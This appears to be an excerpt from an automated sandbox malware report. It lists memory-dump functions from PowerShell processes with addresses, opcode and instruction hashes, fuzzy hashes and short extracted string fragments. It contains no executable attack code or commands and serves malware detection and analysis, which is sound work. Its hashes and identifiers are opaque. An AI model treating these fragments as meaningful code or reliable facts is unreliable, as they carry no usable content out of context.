                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d05199ee642f8e4606b62ab91675cb006ad536d7f181da0f26487e5bb6ed63e3
                                                                                                                    • Instruction ID: dd97655a9d0b767fbfc9721f66b44d5620f51b91994fe489007188176bc71561
                                                                                                                    • Opcode Fuzzy Hash: d05199ee642f8e4606b62ab91675cb006ad536d7f181da0f26487e5bb6ed63e3
                                                                                                                    • Instruction Fuzzy Hash: F4228230A18A4D8FDF98EF4CC495AA97BE2FFA8314F11016DE449D7295CB75E881CB81
                                                                                                                    Function 00007FFD9BAAB4E6 Relevance: .3, Instructions: 337COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b198d3aa18dbe114e30756121607fa163958c89f2117d7be4979394abf4c5ff0
                                                                                                                    • Instruction ID: b47034c807d9639e0b07a87bb45b51610f611bdbbb1cac11e1330dd716f8c72a
                                                                                                                    • Opcode Fuzzy Hash: b198d3aa18dbe114e30756121607fa163958c89f2117d7be4979394abf4c5ff0
                                                                                                                    • Instruction Fuzzy Hash: D4B1F93060DA8D8FDB68DF28C8557E93BE1FF59310F44426EE44DC72A1DA74A941CB92
                                                                                                                    Function 00007FFD9BAAAFE4 Relevance: .1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfc74971f13ba0d301d0996b19879e49beaf44c23ee98a9870a8821dac322f81
                                                                                                                    • Instruction ID: 3fc0e75791099ea1bda5ce986b6766f0d9fa1fe96139bd1a37ca38932fd387ca
                                                                                                                    • Opcode Fuzzy Hash: cfc74971f13ba0d301d0996b19879e49beaf44c23ee98a9870a8821dac322f81
                                                                                                                    • Instruction Fuzzy Hash: 86316330A1A64DDEFBB49F54CC6AFF93291FF41319F810139D41D860E2DA792A45CB21
                                                                                                                    Function 00007FFD9BB745BA Relevance: .1, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 852c87827b68774998f62796ddf068ccefa331c2cd5e039b79697916f6a4e338
                                                                                                                    • Instruction ID: b1c7aa09c1e9653bfeda693fb25d1b4170407e07493aac4c4511f7e163808c64
                                                                                                                    • Opcode Fuzzy Hash: 852c87827b68774998f62796ddf068ccefa331c2cd5e039b79697916f6a4e338
                                                                                                                    • Instruction Fuzzy Hash: 4E21F522F0EA4E0FE3A9E66C58A557872C2FF8531AB5A01FEE11CC75E7DE19EC054241
                                                                                                                    Function 00007FFD9BB7937D Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8efd9607d61f92465fd35e5cedb53474edbf87d2b8b9a17a71ea7245f3b20680
                                                                                                                    • Instruction ID: a193b5ed4832060e0063788988f977dd7b3897bc70d769dc419d07b9ec3166fc
                                                                                                                    • Opcode Fuzzy Hash: 8efd9607d61f92465fd35e5cedb53474edbf87d2b8b9a17a71ea7245f3b20680
                                                                                                                    • Instruction Fuzzy Hash: 9E113A62A0FEC91FE7A2E66848E58647BD1EF5622470A01FAD0DCCF1E3D818AC04C381
                                                                                                                    Function 00007FFD9BB75641 Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a9023baefdcaf8ccf108dbd002ec2ea9b01178909ff3586dee352f6f71b7094
                                                                                                                    • Instruction ID: 81f9aa7c5523c5523b9424d07235e498018a0892b84616e71b28fed44e356501
                                                                                                                    • Opcode Fuzzy Hash: 2a9023baefdcaf8ccf108dbd002ec2ea9b01178909ff3586dee352f6f71b7094
                                                                                                                    • Instruction Fuzzy Hash: BD010822F2F95D0BE3B4E69C28695B4A2C1FF4472475601B7F41CC35D6DD08EC004281
                                                                                                                    Function 00007FFD9BAA3945 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841064102.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                    • Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
                                                                                                                    • Opcode Fuzzy Hash: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
                                                                                                                    • Instruction Fuzzy Hash: 9D01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E881CB45
                                                                                                                    Function 00007FFD9BB78DAA Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad44c18e568bba0f4744a8b938c7cea098557e7052952563f76f08492b07a832
                                                                                                                    • Instruction ID: b720952a4735f00bd3c092fe98888bc4097249fa20d782332f4d6275b31df925
                                                                                                                    • Opcode Fuzzy Hash: ad44c18e568bba0f4744a8b938c7cea098557e7052952563f76f08492b07a832
                                                                                                                    • Instruction Fuzzy Hash: F6F02B33B1DD0D0EE395D26C58155F573D2EFD8135B46027BD16EC36D6ED25D4064240
                                                                                                                    Function 00007FFD9BB79169 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1953694a1c65d29ef84f9ed4895b5284033b50c163db8e1386f872f6bd69d9e1
                                                                                                                    • Instruction ID: ae93a07e8e2bcfe04a66dff897f67c4291f9dc8150441178f6ff06ab9f7b4a27
                                                                                                                    • Opcode Fuzzy Hash: 1953694a1c65d29ef84f9ed4895b5284033b50c163db8e1386f872f6bd69d9e1
                                                                                                                    • Instruction Fuzzy Hash: ACE0D833B1EA092AFB5C955C28660F873C1EFC5234744147FD15FC2897D816A8264245
                                                                                                                    Function 00007FFD9BB7129A Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1841938178.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0fa5eeb233f49f356bf4343c2043018916abd20b556c831a0444d8075c1cc15
                                                                                                                    • Instruction ID: 9f1f8cd47875369848e3bc8652f440758dc150a64cfb274a80341826f81f08fd
                                                                                                                    • Opcode Fuzzy Hash: a0fa5eeb233f49f356bf4343c2043018916abd20b556c831a0444d8075c1cc15
                                                                                                                    • Instruction Fuzzy Hash: 13E09253F0FA894FE795BA7C186A0A827E1EF9526471440BBE04CC71E7DD189C094351

                                                                                                                    Executed Functions

                                                                                                                    Function 04F2E928 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \VWm
                                                                                                                    • API String ID: 0-240642930
                                                                                                                    • Opcode ID: 5f1098ab8d7d3abf59ca50363c0be71de3af15e3342d586a4afa85efac032679
                                                                                                                    • Instruction ID: 578fcad71556cabdfd76e3b5789059263258b441e4727d135f3ced39c6c4c7f8
                                                                                                                    • Opcode Fuzzy Hash: 5f1098ab8d7d3abf59ca50363c0be71de3af15e3342d586a4afa85efac032679
                                                                                                                    • Instruction Fuzzy Hash: 7FB16070E00229DFDF14CFA9CA9579DBBF2BF88304F248129D815A7254EB34A846CF81
                                                                                                                    Function 04F2F1F8 Relevance: .3, Instructions: 266COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 69557f7b05f7ca56ab7a1b3c525155443d1e6fdaf884052e943114ef51aec942
                                                                                                                    • Instruction ID: 571408631532abe1ed469bd1bdfd74a0aab14a7cb509f6089f93e7ccf84a52d3
                                                                                                                    • Opcode Fuzzy Hash: 69557f7b05f7ca56ab7a1b3c525155443d1e6fdaf884052e943114ef51aec942
                                                                                                                    • Instruction Fuzzy Hash: 8EB18070E10219CFDB10CFA9DA917DEBBF2EF88314F148129D415E7294EB74A846DB91
                                                                                                                    Function 07DB6148 Relevance: 13.5, Strings: 10, Instructions: 1030COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                    • API String ID: 0-2890353280
                                                                                                                    • Opcode ID: fe3dadbffad5d0e5bcf3505da6d0534360b1616f1e27542b5753308b84f4ef9b
                                                                                                                    • Instruction ID: 95e50828bd63a74d578becaa0aac0e80f2e65c478f230944d31338532a334f33
                                                                                                                    • Opcode Fuzzy Hash: fe3dadbffad5d0e5bcf3505da6d0534360b1616f1e27542b5753308b84f4ef9b
                                                                                                                    • Instruction Fuzzy Hash: 49829F74A00215CFDB24CB68C951BAAFBF2BF85310F1485AAD50AAF355CB72DC85CB91
                                                                                                                    Function 04F2AE30 Relevance: 10.5, Strings: 8, Instructions: 516COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8NWm$Hbq$h]Wm$h]Wm$h]Wm$$^q$$^q$IWm
                                                                                                                    • API String ID: 0-470068696
                                                                                                                    • Opcode ID: 0e9fb66fd0682ff42bb4f5e30ff8b20a489de25df18466245af37fbef3f5479d
                                                                                                                    • Instruction ID: 445666c6f82022d9ad5ed5935a0368dc4ab4a44584ccf7c26ef3f1863c16f23d
                                                                                                                    • Opcode Fuzzy Hash: 0e9fb66fd0682ff42bb4f5e30ff8b20a489de25df18466245af37fbef3f5479d
                                                                                                                    • Instruction Fuzzy Hash: 75224034B002288FDB29DF24C9546AEB7B2BF89305F1544A9D909AB361DF35ED46CF81
                                                                                                                    Function 07DB7C28 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                    • API String ID: 0-2822668367
                                                                                                                    • Opcode ID: 7fa8520be32e144f2f641ce6d703b302ed5c71dca1123dbb34f82d26a14ba5a7
                                                                                                                    • Instruction ID: 1b39b6d117e9c2fed7d50842f87261662afd7dc85853964f6aecabce2fdb8731
                                                                                                                    • Opcode Fuzzy Hash: 7fa8520be32e144f2f641ce6d703b302ed5c71dca1123dbb34f82d26a14ba5a7
                                                                                                                    • Instruction Fuzzy Hash: 73D19D74A00219CFCB24DBA8C951B9EBBB2AFC8310F14C46AD5066F395CF76EC458B95
                                                                                                                    Function 07DBA1D0 Relevance: 5.6, Strings: 4, Instructions: 570COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                    • API String ID: 0-1420252700
                                                                                                                    • Opcode ID: fc68632af47c6c6ce00eee9a26788f36fef266eed8d73c80b28f5cc835b2b711
                                                                                                                    • Instruction ID: f5912e9ea7abca2d4661b5e700b42fcdeebffc9287930651bb5d00d307a77bbf
                                                                                                                    • Opcode Fuzzy Hash: fc68632af47c6c6ce00eee9a26788f36fef266eed8d73c80b28f5cc835b2b711
                                                                                                                    • Instruction Fuzzy Hash: 841227B1B04316DFC7258BA898117AAFBE29FC6310F14C4AAD44ACF351DE36C945C7A1
                                                                                                                    Function 07DB7C1E Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q$4'^q
                                                                                                                    • API String ID: 0-1196845430
                                                                                                                    • Opcode ID: d0fb12fad6f424e35812dec553aa80cbeacff8249a93005bde4b352966707c4e
                                                                                                                    • Instruction ID: 09f0acdf514ba04227090301b82c5dbeddb0bbde081ff460b5b1c866a523b77e
                                                                                                                    • Opcode Fuzzy Hash: d0fb12fad6f424e35812dec553aa80cbeacff8249a93005bde4b352966707c4e
                                                                                                                    • Instruction Fuzzy Hash: C1A18AB4A00205CFCB24CBA8C951BAEFBB2AF88314F15C45AD9066F355CB76EC45CB95
                                                                                                                    Function 07DB04E0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: 286ac329afcc742e35b472bb3a6b9886e1d26b2fe26304609d40a7719649f93e
                                                                                                                    • Instruction ID: 3fc3f8b4c28037525787ff60068b0e27dd38537ec734555aa31c9d53f03b09a8
                                                                                                                    • Opcode Fuzzy Hash: 286ac329afcc742e35b472bb3a6b9886e1d26b2fe26304609d40a7719649f93e
                                                                                                                    • Instruction Fuzzy Hash: D0412BB5F0021ADBCB349E6998806EFF7E5AFC8610B14842AD94ADF705DE31D905C7A1
                                                                                                                    Function 07DB0BA8 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: 37d5a74e7558fbde36d97bbe19ff4217dedb2a78a0a3010b312fa5f18cb49f1f
                                                                                                                    • Instruction ID: 822e9cae2a5951fdb787f6d6a161ed17aecf02d745b58c065475b57099d1104a
                                                                                                                    • Opcode Fuzzy Hash: 37d5a74e7558fbde36d97bbe19ff4217dedb2a78a0a3010b312fa5f18cb49f1f
                                                                                                                    • Instruction Fuzzy Hash: 84217BB170430ADBD734197A9C40BBBEADA9BC1715F24882AA54BCF395DF36C841C365
                                                                                                                    Function 07DB4410 Relevance: 3.3, Strings: 2, Instructions: 758COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                    • API String ID: 0-2697143702
                                                                                                                    • Opcode ID: 0f767c60f372fe19e4013530cdf4e6026c6a12fe5a701f692ceec365dff5f18f
                                                                                                                    • Instruction ID: bb162db4b1776c77133c8c2884f16ecd487953145bc50f6dc7084a34836bee3d
                                                                                                                    • Opcode Fuzzy Hash: 0f767c60f372fe19e4013530cdf4e6026c6a12fe5a701f692ceec365dff5f18f
                                                                                                                    • Instruction Fuzzy Hash: 00625AB4B00245CFDB24CB98C595AAEBBF2AF85304F15C069D80A9F356CB76EC45CB91
                                                                                                                    Function 07DB108E Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                    • API String ID: 0-2697143702
                                                                                                                    • Opcode ID: 5b1e42bf71100f42de62bd6a9da295272ad838c2d8a0668554a292831210ad52
                                                                                                                    • Instruction ID: 7896adde9d77784943a2fe17684746333829b84041c49b5438ab652c0af3dae7
                                                                                                                    • Opcode Fuzzy Hash: 5b1e42bf71100f42de62bd6a9da295272ad838c2d8a0668554a292831210ad52
                                                                                                                    • Instruction Fuzzy Hash: E1026074B01209DFDB14CB98D591FAEBBF2AB89314F14C059E80A9F356CB72EC458B91
                                                                                                                    Function 07DB6B5B Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                    • API String ID: 0-2697143702
                                                                                                                    • Opcode ID: 11ee3a80c8166e9fb4469b8794d6aac679131275d84619ea787f133f21c81b9d
                                                                                                                    • Instruction ID: f4807c234c00b4f85aff6d93acdd8197eb80bb4649ea868fdd420f97ee1ac468
                                                                                                                    • Opcode Fuzzy Hash: 11ee3a80c8166e9fb4469b8794d6aac679131275d84619ea787f133f21c81b9d
                                                                                                                    • Instruction Fuzzy Hash: 6EF17C74A00225CFDB24DB68CD51FAEBAB2AF84300F1185A9D509AF395CF72DD858F91
                                                                                                                    Function 04F2EF70 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \VWm$\VWm
                                                                                                                    • API String ID: 0-2825661082
                                                                                                                    • Opcode ID: 8261a5d170c13df765f87c681a35a3c45630ed0d907ddee2fb13e9400c9a5e33
                                                                                                                    • Instruction ID: 1e175e1e56d89a557f37df94f7f312df8a4dcbb76394316c143af3be0d861c93
                                                                                                                    • Opcode Fuzzy Hash: 8261a5d170c13df765f87c681a35a3c45630ed0d907ddee2fb13e9400c9a5e33
                                                                                                                    • Instruction Fuzzy Hash: AF715F71E10219DFDF14CFA9CA8179EBBF2AF88314F148129D415AB254EB74A842DFA1
                                                                                                                    Function 04F2EF64 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \VWm$\VWm
                                                                                                                    • API String ID: 0-2825661082
                                                                                                                    • Opcode ID: ef6377b017aa6e8b8a8eccd487ced1bc736f1411069e10b224617992544968d3
                                                                                                                    • Instruction ID: b14cf45bc16b2784643ee963d86bcd43ac6e6f6fb1f551bd88c4272965429629
                                                                                                                    • Opcode Fuzzy Hash: ef6377b017aa6e8b8a8eccd487ced1bc736f1411069e10b224617992544968d3
                                                                                                                    • Instruction Fuzzy Hash: D7717D71E10259DFDB14CFA9CA807DEBBF1BF88314F148129E415AB254EB74A842DFA1
                                                                                                                    Function 07DB3140 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tP^q$tP^q
                                                                                                                    • API String ID: 0-309238000
                                                                                                                    • Opcode ID: 50dee7bd916b8dfacdac1c2aefeddf497af082bd52f83d3b0f0deabdab0aad14
                                                                                                                    • Instruction ID: 732af641706b66a60cfebc86633c1a60eaf6a4765ae8856770fa1e693efbbcee
                                                                                                                    • Opcode Fuzzy Hash: 50dee7bd916b8dfacdac1c2aefeddf497af082bd52f83d3b0f0deabdab0aad14
                                                                                                                    • Instruction Fuzzy Hash: BC31AE71A04355DFC7219BA8C814A66FFF5FF86600F19849BD8858F256C631DC04C7B1
                                                                                                                    Function 04F2BAE8 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1919365324.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_4f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: h]Wm$IWm
                                                                                                                    • API String ID: 0-2289733599
                                                                                                                    • Opcode ID: 000721a54b19cd6c1b506c964a120d712dbf3a31b3f37c8de53b16f6101a0a9a
                                                                                                                    • Instruction ID: fbab94d2d2e763b33845b99f2a363c9512236d6394afc23a3b20c2ec888c43ce
                                                                                                                    • Opcode Fuzzy Hash: 000721a54b19cd6c1b506c964a120d712dbf3a31b3f37c8de53b16f6101a0a9a
                                                                                                                    • Instruction Fuzzy Hash: 8A313E34B001288FCB25DF64CA546EEB7B2BF89305F1144E9D909AB351DB35AE82CF81
                                                                                                                    Function 07DB0BA3 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 9e16d4fd3e8d9711fc1e20ea5d307a6ea5b7462caf3aa73001e30f1e6920aa53
                                                                                                                    • Instruction ID: 1301b9216d41f11ed555ebf7fed64fc748f2e46f97ad2d9cec76472e124d1508
                                                                                                                    • Opcode Fuzzy Hash: 9e16d4fd3e8d9711fc1e20ea5d307a6ea5b7462caf3aa73001e30f1e6920aa53
                                                                                                                    • Instruction Fuzzy Hash: 261159B570430AE6EB34097A8C40BB7AED65BC1714F24882AAA4A8F286DF35C4808265
                                                                                                                    Function 07DB04DB Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.1954431947.0000000007DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7db0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
